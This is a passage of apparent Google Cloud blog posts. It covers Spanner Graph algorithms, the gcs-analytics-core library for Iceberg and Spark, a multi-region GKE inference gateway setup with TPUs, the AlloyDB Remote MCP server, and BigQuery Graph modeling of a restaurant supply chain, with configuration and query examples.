    ORDER BY ringleader.pagerank_score DESC
    LIMIT 1
    WITH ringleader
    MATCH (ringleader)-[e:Transfer]->{1, 5}(receiver:Account)
    WHERE e.ts > '2025-12-01'
    RETURN ringleader.id AS ringleader_id, receiver.id AS receiver_id, e.amount, e.ts;
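
The bounded traversal in this query (one to five Transfer hops after a cutoff date) can be pictured with a breadth-first search. The Python sketch below is a simplified stand-in with hypothetical account IDs and transfers: it reports each reachable account once with its minimum hop count, whereas a GQL path match returns a row per matching path.

```python
from collections import deque
from datetime import date

# Hypothetical transfers: (source, target, amount, date).
TRANSFERS = [
    ("acct-7", "acct-9", 900.0, date(2025, 12, 3)),
    ("acct-9", "acct-4", 850.0, date(2025, 12, 4)),
    ("acct-4", "acct-1", 800.0, date(2025, 11, 20)),  # before the cutoff
]


def trace_funds(transfers, start, since, max_hops=5):
    """Maps each account reachable from `start` within `max_hops` to its hop
    count, following only transfers dated after `since`."""
    outgoing = {}
    for src, dst, _amount, ts in transfers:
        if ts > since:
            outgoing.setdefault(src, []).append(dst)
    hops = {start: 0}
    queue = deque([start])
    while queue:
        current = queue.popleft()
        if hops[current] == max_hops:
            continue  # do not expand past the hop limit
        for nxt in outgoing.get(current, []):
            if nxt not in hops:
                hops[nxt] = hops[current] + 1
                queue.append(nxt)
    del hops[start]
    return hops


print(trace_funds(TRANSFERS, "acct-7", since=date(2025, 12, 1)))
```

The transfer dated before the cutoff is ignored, so the trace stops at the second hop in this sample.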

By allowing you to weave high-performance algorithms with standard GQL queries, Spanner Graph eliminates the need to move data back and forth between operational databases and external analytics engines. This unified approach dramatically simplifies your data architecture and accelerates your time to insight.

Trusted by industry leaders

Customers like DaVita, Yahoo!, SoundCloud, and WPP are already leveraging Spanner Graph algorithms to solve some of their most complex data challenges.

"Leveraging Spanner Graph for our Patient 360 initiative has allowed us to consolidate complex healthcare data into a single, unified view. The addition of native graph algorithms like community detection and centrality is a major step forward, enabling us to uncover deep insights within our patient networks faster and at scale. These fully managed capabilities allow our team to focus on driving innovation in patient care without the operational burden of managing complex data pipelines." - Sam Ghosh, Chief Enterprise Architect at DaVita Kidney Care

"Operating at global scale across Yahoo’s iconic consumer properties requires us to unify billions of user profiles into a single, real-time view. With Spanner Graph, we’ve modeled our Unified User Profile (UUP) as a graph, bringing together previously distributed systems into a centralized source of truth. The addition of fully managed graph algorithms on Spanner further accelerates our ability to deliver personalization at scale. By leveraging algorithms such as community detection and PageRank, we can drive deeper audience segmentation and power more relevant, engaging user experiences across our platform." - Chris James, Director of Engineering, Yahoo

"With 500+ million tracks from 40+ million artists across 190+ countries, SoundCloud is where emerging artists find their sound, hidden gems are discovered, and music culture is shaped in real time. We have been running graph algorithms in batch mode for years, with processes often taking multiple hours on custom clusters to analyze our massive, multi-billion-edge music graph. The launch of Spanner Graph algorithms is a true game-changer: It not only provides the massive scalability we need, but also allows us to move away from complex custom Python workflows to a fully managed service. Most importantly, it unlocks the ability to run graph algorithms on our most up-to-date data for use cases like identifying creator hubs and improving recommendations, without requiring complex ETL pipelines or impacting the low-latency transactional workloads running on Spanner today." - Sergey Chekanskiy, VP of Engineering - Data Foundation, SoundCloud

"We've been eager to leverage advanced graph algorithms for Open Intelligence, our foundational intelligence layer that securely connects trillions of live data points from clients, partners and WPP in a privacy-first way and that is now integrated and powers WPP’s agentic marketing platform, WPP Open. In order to have instant, exploratory access to complex relationships across billions of entities – driving planning, modelling, and experimentation – we need native support for deep graph traversal, structural pattern recognition, and advanced algorithms. Algorithm support on Spanner Graph provides the performance and scalability to tackle our most challenging graph analytics problems without operational overhead or expensive licensing." - Rob Marshall, Head of Strategy, Data & Intelligence, WPP

Build more intelligent applications

Now, with native support for algorithms in Spanner Graph, you can move beyond basic relationship traversals and run deep structural analytics directly on your freshest transaction data. By applying these classic graph algorithms at scale, you can unlock new capabilities for your enterprise applications:

Proactive fraud detection and anti-money laundering: Expose coordinated fraud rings by automatically grouping connected mule accounts with Community Detection (like modularity clustering), then apply centrality (like PageRank) to pinpoint the ringleader who controls the illegal fund flow.
Customer 360 and entity resolution: Unify fragmented, cross-channel data into a single canonical profile using similarity functions like Jaccard and community detection like label propagation. These profiles can be further enriched for downstream ML training by generating topological features, such as PageRank, for each node.
Autonomous network operations and digital twins: Model your IT or telecom infrastructure as a digital twin, using similarity and path finding (like set-to-set shortest path) to proactively identify critical vulnerabilities and predict cascading failures.
Hyper-personalized product recommendations: Move beyond basic purchase histories by analyzing broader user behaviors. Use similarity algorithms (like common neighbors) to find overlapping preferences between entities, and centrality (like personalized PageRank) to surface the most relevant recommendations for those peer groups.
Resilient supply chain and logistics: Protect your supply chain from hidden bottlenecks using centrality (like betweenness centrality) to pinpoint over-relied-upon distribution hubs, and path finding to instantly calculate efficient alternative routes during disruptions.
Cybersecurity threat hunting and blast-radius analysis: Accelerate threat hunting by applying community detection (like correlation clustering) to isolate anomalous machine communications, and path finding to trace the attacker's exact lateral movement and blast radius.
Predictive customer churn analysis: Stop contagious customer churn by mapping out tight-knit subscriber groups with community detection, then apply centrality to identify and target core influencers with retention promotions before the churn spreads.

Get started today

Spanner Graph algorithms are supported with the Enterprise and Enterprise+ editions of Spanner. To learn more, view the documentation or try out this codelab. You can also watch this video for a summary of graph algorithm support with Spanner Graph.

Accelerating data lakes: Optimizing Apache Iceberg and Spark with gcs-analytics-core

Tue, 02 Jun 2026 16:00:00 +0000

Many data engineers spend significant time managing compatibility and getting the best performance across multiple analytics engines. To help solve this pain point, we are excited to announce gcs-analytics-core, a new open-source Java library designed to centralize and accelerate analytics optimizations for Google Cloud Storage (GCS).

With this library, you get the flexibility to select your preferred analytics engine while achieving high performance on GCS. The gcs-analytics-core library provides optimizations for the analytics engines that you use on GCS today, such as the Iceberg Spark engine, and we plan to expand it to other analytics engines by the end of this year.

Built to be shared across major data processing frameworks like Apache Spark, this library consolidates and improves performance for analytics workloads on GCS. Available natively in the Apache Iceberg Java runtime starting from version 1.11.0, this library improves read operations for columnar formats like Parquet.

What is the gcs-analytics-core library?

The gcs-analytics-core library is a centralized optimization layer that sits between your analytics engines — such as Apache Spark, Trino, and Apache Hive — and the underlying GCS Java SDK. It intercepts read calls and injects performance enhancements, providing a consistent experience without requiring framework-specific tuning.

For Apache Iceberg users, it integrates into the GCSFileIO implementation, replacing traditional sequential reads with parallelized strategies to minimize latency and maximize throughput.

Key technical optimizations

The library introduces specific optimizations designed to reduce time spent on I/O and end-to-end execution time:

Vectored I/O (threaded): This feature improves read performance by fetching multiple data ranges in parallel within a single operation, reducing the overhead of GCS calls. Without this feature, the system needs to issue a separate call for each data range, increasing both the number of operations and open file latency for each request.
Smart Parquet prefetching: When reading Parquet data, analytics engines typically perform an initial read of the file’s footer, which contains the data structure and information about where specific data ranges are located. The library automatically prefetches this footer data in a single chunk (typically 50KB–100KB), avoiding the multiple network calls that often occur when engines repeatedly seek backward to fetch metadata.
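
The two optimizations above can be sketched in a few lines of Python. This is an illustration only, not the library's Java implementation: the in-memory bytes object stands in for a GCS object, read_range stands in for one ranged request, and the 64 KB prefetch size is an assumption picked from within the range quoted above. The footer layout (metadata, then a 4-byte little-endian length, then the "PAR1" magic bytes) follows the Parquet file format.

```python
import struct
from concurrent.futures import ThreadPoolExecutor

PARQUET_MAGIC = b"PAR1"


def read_range(blob, offset, length):
    """Stand-in for one ranged read against object storage."""
    return blob[offset:offset + length]


def read_vectored(blob, ranges, max_workers=4):
    """Fetches several (offset, length) ranges in parallel, preserving order."""
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        return list(pool.map(lambda r: read_range(blob, *r), ranges))


def prefetch_footer(blob, prefetch_bytes=64 * 1024):
    """Reads the file tail once and slices the Parquet footer out of it."""
    size = len(blob)
    tail_start = max(0, size - prefetch_bytes)
    tail = read_range(blob, tail_start, size - tail_start)
    if tail[-4:] != PARQUET_MAGIC:
        raise ValueError("not a Parquet file")
    (footer_len,) = struct.unpack("<I", tail[-8:-4])
    if footer_len + 8 > len(tail):
        # Footer is larger than the prefetched tail, so a second read is needed.
        return read_range(blob, size - 8 - footer_len, footer_len)
    return tail[-8 - footer_len:-8]
```

When the footer fits inside the prefetched tail, the metadata arrives in a single read instead of one read for the length and another for the footer itself.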

Spotlight: Apache Iceberg integration

We delivered the first major integration of this library into Apache Iceberg. With Iceberg 1.11.0 or later, analytics engines utilizing Iceberg’s GCSFileIO can leverage these performance enhancements. To adopt the library in your environment, verify your Iceberg catalog is configured to use the native GCS FileIO:

    # Spark configuration example
    spark.sql.catalog.my_catalog.io-impl=org.apache.iceberg.gcp.gcs.GCSFileIO

Because the core optimizations are embedded within the updated Iceberg runtime and the GCS connector architecture, you automatically benefit from Parquet footer prefetching and multi-threaded vectored reads — with no complex custom tuning required.

You can follow the specific integration details in Apache Iceberg Issue #14326.

Catalog compatibility

The gcs-analytics-core library is compatible with all Iceberg catalogs including the REST catalog, Hive, and other metadata management systems. By decoupling the performance optimizations from the catalog management layer, the library provides consistent read improvements without requiring adjustments to your existing infrastructure setup so you can scale across diverse data lake architectures.

TPC-DS Performance Benchmarks using Spark

To validate these improvements, end-to-end benchmarking was performed using an open source Apache Spark cluster with an Iceberg catalog configured to use GCSFileIO along with the gcs-analytics-core library.

The benchmark leveraged the industry-standard TPC-DS schema across varying dataset sizes (from 1GB up to 10TB), specifically comparing the new library's optimizations against the default GCSFileIO implementation, which uses sequential vectored reads.

By alleviating the I/O bottleneck at the storage layer, compute engines spend less time waiting for network responses (scan time) and more time processing data (execution time).

Here are the end-to-end TPC-DS benchmark results showcasing the percentage improvement when enabling gcs-analytics-core:

TPC-DS schema size	Scan time improvement	Execution time improvement
1 GB	71.51%	32.61%
10 GB	48.48%	18.94%
100 GB	40.98%	10.95%
1 TB	35.86%	3.38%
10 TB	18.40%	1.58%

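As the data shows, scan time and execution time improve at every dataset size, with the largest relative gains on smaller datasets: scan time improves by 71.51% at 1 GB and by 18.40% at 10 TB. The library is effective for the complex query patterns in TPC-DS, delivering scan time reductions that directly lower overall query execution time.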
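
To read these percentages as speedup factors, the short Python sketch below converts each figure, assuming that "improvement" means the percentage reduction in elapsed time relative to the baseline. That interpretation is an assumption; the benchmark methodology is not spelled out here.

```python
# Scan-time and execution-time improvements from the table above, in percent.
RESULTS = {
    "1 GB": (71.51, 32.61),
    "10 GB": (48.48, 18.94),
    "100 GB": (40.98, 10.95),
    "1 TB": (35.86, 3.38),
    "10 TB": (18.40, 1.58),
}


def speedup(improvement_pct):
    """Converts a percentage time reduction into a speedup factor."""
    return 1.0 / (1.0 - improvement_pct / 100.0)


for size, (scan_pct, exec_pct) in RESULTS.items():
    print(f"{size:>6}: scan {speedup(scan_pct):.2f}x, "
          f"execution {speedup(exec_pct):.2f}x")
```

Under that assumption, a 50% reduction corresponds to a 2x speedup, so the gap between scan-time and execution-time gains shows how much of each query is spent outside storage I/O.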

Get started

Before running your Spark workloads, confirm that the following requirements and configurations are met:

Use Apache Iceberg Spark runtime 1.11.0+ and the iceberg-gcp-bundle 1.11.0+.
Configure your catalog to use GCSFileIO.
Enable the gcs-analytics-core optimization flag (spark.sql.catalog.$CATALOG_NAME.gcs.analytics-core.enabled=true).
Enable vectorized I/O (spark.sql.iceberg.vectorization.enabled=true) to get the improved read performance.

    spark-submit \
      --packages org.apache.iceberg:iceberg-spark-runtime-3.5_2.12:1.11.0,org.apache.iceberg:iceberg-gcp-bundle:1.11.0 \
      --conf spark.sql.catalog.$CATALOG_NAME=org.apache.iceberg.spark.SparkCatalog \
      --conf spark.sql.catalog.$CATALOG_NAME.io-impl=org.apache.iceberg.gcp.gcs.GCSFileIO \
      --conf spark.sql.catalog.$CATALOG_NAME.gcs.analytics-core.enabled=true \
      --conf spark.sql.iceberg.vectorization.enabled=true \
      <your-application-jar-or-script>
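
If you assemble Spark settings programmatically, the same properties can be generated per catalog. The Python helper below is a hypothetical convenience (the function names are not part of any library); the property keys and values are the ones listed above.

```python
def iceberg_gcs_confs(catalog_name):
    """Builds the Spark properties listed above for one Iceberg catalog."""
    prefix = f"spark.sql.catalog.{catalog_name}"
    return {
        prefix: "org.apache.iceberg.spark.SparkCatalog",
        f"{prefix}.io-impl": "org.apache.iceberg.gcp.gcs.GCSFileIO",
        f"{prefix}.gcs.analytics-core.enabled": "true",
        "spark.sql.iceberg.vectorization.enabled": "true",
    }


def to_spark_submit_args(confs):
    """Flattens properties into ['--conf', 'key=value', ...] for spark-submit."""
    args = []
    for key, value in confs.items():
        args += ["--conf", f"{key}={value}"]
    return args


confs = iceberg_gcs_confs("my_catalog")
print(" ".join(to_spark_submit_args(confs)))
```

In a PySpark application, the same key-value pairs could instead be applied one at a time with SparkSession.builder.config(key, value) before the session is created.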

The gcs-analytics-core library is open source, so you can explore the source code and contribute to the project. Our implementation and micro-benchmark configurations are part of the repository and can be referenced for your contributions or validations.

GitHub repository: GoogleCloudPlatform/gcs-analytics-core
Documentation: Review the design document for deep architectural details.

We want to hear about your experience. If you test this on your own datasets, please feel free to open an issue on GitHub or share your results with the community. We look forward to seeing how you utilize these optimizations in your data lakes.

Experimenting with TPUs, GKE Managed DRANET, and Multi-cluster Inference Gateway

Tue, 02 Jun 2026 07:00:00 +0000

What happens when your workload fails in one region but you still need access to the service? This is a common availability and uptime scenario. With recent enhancements to the Kubernetes ecosystem, including capabilities like Dynamic Resource Allocation (DRA) and Inference Gateway, I decided to experiment with these capabilities in Google Cloud, using an AI inference workload as a simple test.

In this blog post, we explore this setup. You can also jump straight into the detailed configs in this codelab: Build multi-cluster GKE Inference Gateway, with TPUs, Cloud Storage FUSE and managed DRANET.

Building blocks

To build out this experiment, use the following products, features, and tools:

Google Kubernetes Engine (GKE) managed DRANET: A managed feature that lets you request and share resources among Pods. It supports GPUs and TPUs. In this test, TPUs were used in two different regions, with networking assigned using managed DRANET.
Multi-cluster GKE Inference Gateway: Load balances your AI/ML inference workloads across multiple GKE clusters, including in a failover situation, which is what my experiment was intended to test. The Gateway class that supports this is the multi-cluster cross-region internal Application Load Balancer, gke-l7-cross-regional-internal-managed-mc.
Cloud Storage FUSE: Provides a way to store data, models, checkpoints, and logs directly in Cloud Storage. To speed up the deployment, an open source Gemma model was downloaded to this storage for retrieval.
Virtual Private Cloud (VPC): The foundational global network providing isolated, secure communication for the internal load balancers and compute nodes.
GKE Fleets: Fleets group the separate regional clusters under a unified management control plane.
TPU v6e: Google's custom AI accelerators that provide the high-performance compute required to serve the model. The VM type used was ct6e-standard-4t in a 2x2 slice.

Design pattern example

The aim is to deploy an LLM (Gemma 3) onto two GKE clusters in different regions. Each cluster uses four TPU v6e chips. The model is stored in Cloud Storage. The workload is served using GKE Inference Gateway, which supports multiple clusters. Traffic should be routed to the region closest to the user and fail over to the other region if one region fails.

Putting it together

To get access to TPUs for your project in two regions, make sure you have the necessary quota in those regions.

Begin: Set up the environment.

Create a standard VPC with firewall rules and a subnet in the same region as the reservation.
Create a proxy-only subnet. This is used by the internal Application Load Balancer attached to the GKE Inference Gateway.
Set up firewall rules allowing traffic and health checks.
Reserve static internal IP addresses in both regions for the Gateway.
Provision a Cloud Storage FUSE bucket and configure a dedicated IAM Service Account. Bind this to a Kubernetes Workload Identity so your pods can securely mount the bucket and read the model weights directly.

Next: Create standard GKE clusters and node pools.

Deploy two separate GKE clusters, one in each of your chosen regions.
Enable the Gateway API (--gateway-api=standard) and the Cloud Storage FUSE CSI driver (--addons GcsFuseCsiDriver) during cluster creation.
Create dedicated TPU v6e node pools (ct6e-standard-4t) for both clusters.
Enable managed DRANET on these TPU node pools by setting the flags --accelerator-network-profile=auto and --node-labels=cloud.google.com/gke-networking-dra-driver=true.

Next: Establish the global mesh via Fleet Registration.

Register both GKE clusters to a unified GKE Fleet by following the fleet creation and registration setup.
Enable Multi-Cluster Service Discovery and Multi-Cluster Ingress on your fleet.
Designate your primary region as the configuration hub to act as the control plane for routing rules across both regions.

Next: Deploy the AI workload.

Use a temporary Kubernetes job to download the Gemma 3 (gemma-3-27b-it) model weights directly into your Cloud Storage bucket.
Define a ResourceClaimTemplate that explicitly requests the managed DRANET device class (deviceClassName: netdev.google.com) with the allocation mode set to "All".

    apiVersion: resource.k8s.io/v1
    kind: ResourceClaimTemplate
    metadata:
      name: all-netdev
      namespace: default
    spec:
      spec:
        devices:
          requests:
          - name: req-netdev
            exactly:
              deviceClassName: netdev.google.com
              allocationMode: All

Deploy your inference server (e.g. vLLM) on the TPU nodes in both regions. Ensure the pod spec utilizes node selectors for the 2x2 TPU topology, requests exactly 4 TPUs, and mounts the netdev claim. This guarantees your pods utilize the dedicated accelerator networking alongside standard Ethernet.

Next: Configure the Multi-Cluster Inference Gateway.

Install the necessary Custom Resource Definitions (CRDs) so Kubernetes can process specialized routing objects like the InferenceObjective.
Deploy an AutoscalingMetric to track hardware utilization, such as KV cache usage.
Use Helm to group the independent AI deployments from both regions into a single, logical InferencePool.
Deploy the Cross-Region Gateway and its associated HTTPRoute to manage incoming global traffic.
Apply health checks and backend policies to the pool to ensure load balancing relies on your custom hardware metrics.

Configure an InferenceObjective to instruct the gateway to route prompts to the region with the highest availability, avoiding overloaded TPUs.

    apiVersion: gateway.networking.k8s.io/v1
    kind: Gateway
    metadata:
      name: cross-region-gateway
      namespace: default
    spec:
      gatewayClassName: gke-l7-cross-regional-internal-managed-mc
      addresses:
      - type: networking.gke.io/named-address-with-region
        value: "regions/europe-west4/addresses/gemma-gateway-ip-europe-west4"
      - type: networking.gke.io/named-address-with-region
        value: "regions/us-east5/addresses/gemma-gateway-ip-us-east5"
      listeners:
      - name: http
        protocol: HTTP
        port: 80
    ---
    apiVersion: gateway.networking.k8s.io/v1
    kind: HTTPRoute
    metadata:
      name: gemma-route
      namespace: default
    spec:
      parentRefs:
      - name: cross-region-gateway
        kind: Gateway
      rules:
      - backendRefs:
        - group: networking.gke.io
          kind: GCPInferencePoolImport
          name: gemma-pool
          port: 8000
    ---
    apiVersion: networking.gke.io/v1
    kind: HealthCheckPolicy
    metadata:
      name: gemma-health-check
      namespace: default
    spec:
      targetRef:
        group: networking.gke.io
        kind: GCPInferencePoolImport
        name: gemma-pool
      default:
        config:
          type: HTTP
          httpHealthCheck:
            requestPath: /health
            port: 8000
    ---
    apiVersion: networking.gke.io/v1
    kind: GCPBackendPolicy
    metadata:
      name: gemma-backend-policy
      namespace: default
    spec:
      targetRef:
        group: networking.gke.io
        kind: GCPInferencePoolImport
        name: gemma-pool
      default:
        timeoutSec: 100
        balancingMode: CUSTOM_METRICS
        trafficDuration: LONG
        customMetrics:
        - name: gke.named_metrics.tpu-cache
          dryRun: false
          maxUtilizationPercent: 60
    ---
    apiVersion: autoscaling.gke.io/v1beta1
    kind: AutoscalingMetric
    metadata:
      name: tpu-cache
      namespace: default
    spec:
      selector:
        matchLabels:
          app: gemma-server
      endpoints:
      - port: 8000
        path: /metrics
        metrics:
        - name: vllm:kv_cache_usage_perc
          exportName: tpu-cache
    ---
    apiVersion: inference.networking.x-k8s.io/v1alpha2
    kind: InferenceObjective
    metadata:
      name: gemma-objective
      namespace: default
    spec:
      priority: 10
      poolRef:
        name: gemma-pool
        group: "inference.networking.k8s.io"

Testing the Failover

Verify the highly available architecture by simulating a primary region outage. Once the primary deployment is taken offline, the Gateway automatically detects the failure and seamlessly reroutes all subsequent user requests to the active secondary cluster, ensuring continuous availability without dropping traffic.
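
The routing behavior being tested can be modeled in a few lines of Python. This is a deliberately simplified illustration, not the load balancer's actual algorithm: the Backend class and pick_backend function are hypothetical, the region names and the 60% cap are taken from the configuration above, and the utilization figures are made up.

```python
from dataclasses import dataclass


@dataclass
class Backend:
    region: str
    healthy: bool
    kv_cache_pct: float  # stand-in for the exported tpu-cache metric


def pick_backend(backends_by_proximity, max_utilization_pct=60.0):
    """Returns the closest healthy backend under the utilization cap.

    Falls back to the least-loaded healthy backend if all are over the cap,
    and returns None if no backend is healthy.
    """
    healthy = [b for b in backends_by_proximity if b.healthy]
    for backend in healthy:
        if backend.kv_cache_pct < max_utilization_pct:
            return backend
    return min(healthy, key=lambda b: b.kv_cache_pct, default=None)


primary = Backend("europe-west4", healthy=True, kv_cache_pct=20.0)
secondary = Backend("us-east5", healthy=True, kv_cache_pct=30.0)

print(pick_backend([primary, secondary]).region)  # closest region serves
primary.healthy = False                           # simulate a regional outage
print(pick_backend([primary, secondary]).region)  # traffic fails over
```

Taking the primary offline in the sketch mirrors the test above: requests that would have gone to the closest region are served by the remaining healthy one.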

Next Steps

To take a deeper dive with a hands-on codelab, or to find more information on these features, review the following resources.

Hands-on Codelab: Build multi-cluster GKE Inference Gateway, with TPUs, Cloud Storage FUSE and managed DRANET
Document set: DRANET
Documentation: AI Hypercomputer

Want to ask a question, find out more, or share a thought? Please connect with me on LinkedIn.

The fully-managed Remote MCP Server for AlloyDB is now Generally Available

Mon, 01 Jun 2026 16:00:00 +0000

AI agents possess incredible reasoning capabilities and can perform increasingly complex actions. But the reliability of agentic outcomes depends entirely on the quality of the context they can access — context that is frequently locked away in operational databases.

To bridge this gap, we are excited to announce that the Remote Model Context Protocol (MCP) Server for AlloyDB is now generally available.

The Model Context Protocol (MCP) is an open-source standard that gives LLMs a secure, consistent way to connect to external data sources. As part of Google Cloud’s recent rollout of 50+ Google-managed MCP servers, this new integration makes it easier than ever for both interactive and autonomous agents to securely harness the full power of your enterprise data. For example, you can now ask an AI agent for an up-to-the-millisecond view of your delivery fleet by connecting it to your real-time logistics data in AlloyDB, avoiding inaccuracies due to stale data and reducing the need for manual reporting.

Why AlloyDB is a strong foundation for agentic apps

By connecting MCP to AlloyDB, your agents get access to the premier database built for enterprise-grade AI. AlloyDB delivers the scale, speed, and intelligence required for the most demanding agentic workloads:

Supercharged vector performance: Scale to over 10 billion vectors at up to 6x the speed of standard PostgreSQL for vector queries (and up to 10x faster for filtered queries) with the ScaNN index.
Advanced search and reranking: Power multimodal applications with hybrid search via RUM (in Preview) and intelligent reranking through Reciprocal Rank Fusion (RRF) or Gemini Enterprise Platform models.
Real-time intelligence: Efficiently generate millions of embeddings using built-in AI Functions to facilitate low-latency, real-time agentic experiences.
Unified data access: Give agents a single PostgreSQL interface to seamlessly join operational data in AlloyDB with analytical data in BigQuery or archived data in Iceberg tables via Lakehouse Federation.
Enterprise-grade scale: Rest easy with a 99.99% SLA, autopilot database optimizations, and auto-scaling read pools with up to 20 nodes.
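
As background on the reranking technique mentioned in the list above, Reciprocal Rank Fusion combines several ranked result lists by summing 1 / (k + rank) for each item. The Python sketch below shows the general technique only; the constant k = 60 is a commonly used default and an assumption here, the document IDs are hypothetical, and nothing in it reflects how AlloyDB implements reranking.

```python
from collections import defaultdict


def reciprocal_rank_fusion(rankings, k=60):
    """Fuses ranked lists of document IDs; each list adds 1 / (k + rank)."""
    scores = defaultdict(float)
    for ranking in rankings:
        for rank, doc_id in enumerate(ranking, start=1):
            scores[doc_id] += 1.0 / (k + rank)
    # Highest fused score first; ties broken by document ID for stability.
    return sorted(scores, key=lambda d: (-scores[d], d))


vector_hits = ["a", "b", "c"]  # e.g. results ordered by vector similarity
text_hits = ["b", "c", "a"]    # e.g. results ordered by keyword relevance
print(reciprocal_rank_fusion([vector_hits, text_hits]))
```

Because only ranks are used, the method can merge result lists whose raw scores are not comparable, such as vector distances and text relevance scores.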

Why Remote MCP matters for AlloyDB

Local MCP servers are great for local development, but communicating over standard input/output (stdio) streams becomes difficult when you scale to production workloads. It is both architecturally complex and administratively burdensome to provision and manage all of the infrastructure and security guardrails you need to run agents for high-value use cases that interact with sensitive operational data.

The Remote MCP Server for AlloyDB runs on fully-managed Google Cloud infrastructure and exposes an HTTP endpoint that connects your AI applications to your data. This solves key challenges for teams building agents on PostgreSQL:

Centralized discovery: Find, secure, and manage your database's MCP server using Agent Registry.
Fully-managed HTTP endpoints: No need to deploy or maintain the infrastructure required for connectivity. Configure your agent to use the endpoint to get started.
Fine-grained authorization: Instead of using shared database passwords or API keys, you use Identity and Access Management (IAM) to restrict agents to specific tables, schemas, or views. With the read-only execute SQL tool, you can prevent your agent from making accidental changes to or deletions from your database.
Operational instance management: The AlloyDB toolset gives agents the ability to do more than run queries. Agents can update instances, export and import data, create backups, and restore clusters.
Model Armor protection: Model Armor provides optional prompt and response security to screen and filter data, defending against prompt injections or accidental data exfiltration.
Audit logging: Every query, action, and tool call goes to Cloud Audit Logs, giving security teams a full audit trail.

Let's see it in action: A quick demo

Getting started with the AlloyDB Remote MCP server is a straightforward process. To see it in action in your own environment, you can follow our new Codelab, which guides you through these essential steps:

API & environment prep: Enable the AlloyDB, Compute Engine, and Gemini Enterprise APIs in your Google Cloud project.
Provision your database: Deploy your AlloyDB cluster, create your database, and import your sample data.
Enable the Data Access API: Turn on the Data Access API for your AlloyDB instance.
Connect the agent: Configure your MCP client by providing the remote endpoint (https://alloydb.googleapis.com/mcp). Pass your Google Cloud IAM credentials using an OAuth 2.0 bearer token in the HTTP Authorization header.
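
To illustrate what the final step amounts to at the HTTP level, the Python sketch below builds (but does not send) a JSON-RPC 2.0 request for the endpoint above with a bearer token in the Authorization header. The helper name and placeholder token are hypothetical, and the request shape follows the general MCP convention of JSON-RPC over HTTP rather than anything AlloyDB-specific. In practice, an MCP client library normally handles the initialization handshake and session for you.

```python
import json
import urllib.request

MCP_ENDPOINT = "https://alloydb.googleapis.com/mcp"  # endpoint from the steps above


def build_mcp_request(access_token, method, params=None, request_id=1):
    """Builds (but does not send) a JSON-RPC 2.0 POST for an MCP endpoint."""
    payload = {"jsonrpc": "2.0", "id": request_id, "method": method}
    if params is not None:
        payload["params"] = params
    return urllib.request.Request(
        MCP_ENDPOINT,
        data=json.dumps(payload).encode("utf-8"),
        method="POST",
        headers={
            "Authorization": f"Bearer {access_token}",
            "Content-Type": "application/json",
            "Accept": "application/json, text/event-stream",
        },
    )


# Placeholder token; a real one could come from `gcloud auth print-access-token`.
request = build_mcp_request("YOUR_ACCESS_TOKEN", "tools/list")
print(request.get_method(), request.full_url)
```

The "tools/list" method asks the server which tools it exposes, which is typically one of the first calls a client makes after connecting.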

Once the connection is established, your agent can provide reliable, grounded answers to complex business questions using your real-time operational data. By performing introspection queries, the agent automatically understands your database schema – including tables and columns – enabling it to construct sophisticated joins and queries to fulfill user requests accurately.

Once your agent has access to the AlloyDB toolset, it can execute queries, analyze operational trends, and dynamically rank text data using AlloyDB AI functions like AI.RANK().

Security remains paramount: the Remote MCP Server for AlloyDB integrates seamlessly with Model Armor. This provides protection against sensitive data leaks, even if the agent’s service account possesses broad access permissions within the database.

What's next

By enabling agents to interact securely with transactional data, we are embracing an architecture where AI agents can reliably access and act upon your enterprise’s single source of truth.

Ready to build? Discover AlloyDB with a 30-day free trial, and dive into the Remote MCP for AlloyDB Codelab to start powering your enterprise agentic applications today.

Modeling a digital twin of a food supply chain using BigQuery Graph

Mon, 01 Jun 2026 16:00:00 +0000

The example of a growing restaurant

Imagine you are running a restaurant chain. As the chain grows, you can no longer physically see and touch everything to know how the business is operating. You need tools, and a digital replica of your business, to sense its health for you.

The friction of growth

Growth creates a unique kind of friction that spreadsheets simply weren't built to solve:

The bullwhip effect: Small downstream demand shifts swell into upstream inventory tidal waves.
SOP drift: Tiny departures from standard prep work eventually erode the entire brand vibe.
The food safety blast radius: One contaminated ingredient creates a messy, complex map of risk across the network.
Maverick spend: The "million-dollar leak" caused by local managers purchasing ingredients off-contract.

The digital twin

Digital models empower us to ask more insightful questions about the world, but they also force a critical choice in how we structure data. While traditional relational tables have been the standard, we must ask: are they still the right tool for everything? Given that our world is inherently interconnected, perhaps shifting to graph-based models is the natural evolution for capturing reality.

When managing thousands of assets, complex supply chains, or global logistics networks, traditional relational databases require massive, resource-intensive SQL joins to trace dependencies. This architecture creates a latency gap between physical events and operational awareness.

Modeling with BigQuery Graph

BigQuery Graph allows you to build a digital twin of your entire supply chain within your existing data platform. By turning your physical world—items, recipes, and locations—into a searchable map of nodes and edges, you gain a new level of clarity.

1. Defining the Semantic Layer

Instead of moving data to a new database, you create a Graph View over your existing tables. This tells BigQuery exactly how your tables relate to one another.

Query Language:

    # Build the Graph Nodes & Edges
    CREATE OR REPLACE PROPERTY GRAPH `restaurant.bombod`
    NODE TABLES (
      `restaurant.item` LABEL item PROPERTIES ALL COLUMNS,
      `restaurant.location` LABEL location PROPERTIES ALL COLUMNS,
      `restaurant.itemlocation` LABEL itemlocation PROPERTIES ALL COLUMNS
    )
    EDGE TABLES (
      `restaurant.bom`
        KEY (bomKey)
        SOURCE KEY (childItemLocation) REFERENCES `restaurant.itemlocation`(itemLocationKey)
        DESTINATION KEY (parentItemLocation) REFERENCES `restaurant.itemlocation`(itemLocationKey)
        LABEL consists_of PROPERTIES ALL COLUMNS
    );

Image of a fictitious restaurant supply chain modeled using BigQuery Graph

Precision in practice

How does this change daily operations? It moves the business from panic to precision.

Surgical recalls: If a supplier reports a Listeria outbreak, you walk the graph forward to find exactly which menu items in which specific restaurants are affected.
Weather risk analysis: When a hurricane threatens a distribution center, you don't see a list of stores; you see the blast radius. You identify the locations critically dependent on that hub and reroute supplies.
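
To make "walking the graph forward" concrete, here is a minimal Python sketch of the traversal behind a surgical recall. It is an illustration only, not how BigQuery Graph executes queries: the edge list, the item-location names, and the `affected_downstream` helper are all hypothetical, and the edges are assumed to point from a child item-location to the parent that consumes it, as in the graph definition above.

```python
from collections import deque

# Hypothetical bill-of-materials edges, each pointing from a child
# item-location to the parent item-location that consumes it.
EDGES = [
    ("romaine@supplier", "romaine@dc-east"),
    ("romaine@dc-east", "caesar-salad@store-12"),
    ("romaine@dc-east", "chicken-wrap@store-12"),
    ("romaine@dc-east", "caesar-salad@store-40"),
    ("tomato@dc-east", "house-salad@store-40"),
]


def affected_downstream(edges, start):
    """Return every item-location reachable from `start` along child -> parent edges."""
    parents = {}
    for child, parent in edges:
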